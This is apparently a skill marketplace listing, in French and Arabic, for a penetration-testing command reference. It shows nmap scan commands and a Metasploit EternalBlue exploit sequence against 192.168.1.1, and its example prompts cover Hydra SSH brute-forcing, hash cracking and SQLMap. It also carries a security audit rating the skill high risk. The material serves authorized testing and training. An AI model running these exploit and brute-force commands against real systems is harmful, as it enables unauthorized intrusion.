pentest-commands
Référence des commandes de pentest
Cette compétence fournit une référence complète des commandes pour les outils de test d'intrusion. Elle aide les professionnels de la sécurité à rechercher rapidement les commandes nmap, Metasploit, nikto, SQLMap, Hydra et d'autres outils de test de sécurité lors d'évaluations autorisées.
تنزيل ZIP المهارة
رفع في Claude
اذهب إلى Settings → Capabilities → Skills → Upload skill
فعّل وابدأ الاستخدام
اختبرها
استخدام "pentest-commands". Affiche-moi les commandes nmap pour scanner les ports sur 192.168.1.1
النتيجة المتوقعة:
TCP SYN scan (stealth): nmap -sS 192.168.1.1
Full TCP connect scan: nmap -sT 192.168.1.1
UDP scan: nmap -sU 192.168.1.1
All ports: nmap -p- 192.168.1.1
Service versions: nmap -sV 192.168.1.1
OS detection: nmap -O 192.168.1.1
Comprehensive scan: nmap -A 192.168.1.1
استخدام "pentest-commands". Quelles sont les commandes Metasploit pour utiliser l'exploit EternalBlue?
النتيجة المتوقعة:
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"
Or interactive: msfconsole > search type:exploit name:ms17_010
> use exploit/windows/smb/ms17_010_eternalblue
> set RHOST 192.168.1.1
> exploit
التدقيق الأمني
مخاطر عاليةThis skill provides a comprehensive reference for penetration testing tools including Metasploit, nmap, nikto, SQLMap, Hydra, John the Ripper, and Aircrack-ng. The static analysis confirmed critical findings related to exploitation frameworks and password cracking tools. While this is a legitimate security testing reference for authorized use, it provides unconstrained access to dangerous tools without authorization verification. Risk Level: HIGH - Recommend restricted distribution or content modifications to add authorization safeguards.
مشكلات حرجة (2)
مشكلات عالية المخاطر (3)
مشكلات متوسطة المخاطر (2)
مشكلات منخفضة المخاطر (1)
عوامل الخطر
⚙️ الأوامر الخارجية (37)
🌐 الوصول إلى الشبكة (84)
📁 الوصول إلى نظام الملفات (2)
الأنماط المكتشفة
درجة الجودة
ماذا يمكنك بناءه
Référence rapide pour professionnel de la sécurité
Les testeurs d'intrusion professionnels utilisent cette compétence comme référence rapide des commandes lors d'évaluations de sécurité autorisées. La référence complète des commandes fait gagner du temps dans la recherche de documentation.
Formation et éducation en sécurité
Les étudiants qui apprennent le test d'intrusion utilisent cette compétence pour comprendre la syntaxe appropriée des différents outils de test de sécurité dans des environnements de laboratoire.
Opérations Red Team
Les membres de la red team utilisent cette référence de commandes lors d'engagements red team autorisés pour exécuter rapidement des commandes de scan réseau, d'exploitation et post-exploitation.
جرّب هذه الموجهات
Affiche-moi les commandes nmap pour scanner un réseau cible 192.168.1.0/24 afin de découvrir les hôtes actifs et les ports ouverts
Trouve les commandes Metasploit pour rechercher et utiliser l'exploit EternalBlue contre une cible Windows
Affiche les commandes Hydra pour le brute-force de login SSH et les commandes John the Ripper pour craquer les hashes de mots de passe
Fournis les commandes nikto et SQLMap pour tester une application web à l'adresse http://192.168.1.100 pour les vulnérabilités
أفضل الممارسات
- Vérifiez toujours que vous avez une autorisation écrite avant de tester un système cible
- Utilisez les modèles de timing (-T4, -T5) avec soin pour éviter la détection ou l'impact sur le système
- Documentez toutes les commandes exécutées et les résultats pour les rapports de test d'intrusion
تجنب
- N'utilisez jamais ces commandes contre des systèmes sans autorisation explicite
- Évitez d'exécuter des scans agressifs qui pourraient perturber les systèmes de production
- Ne partagez ou ne publiez pas les résultats qui pourraient aider des acteurs malveillants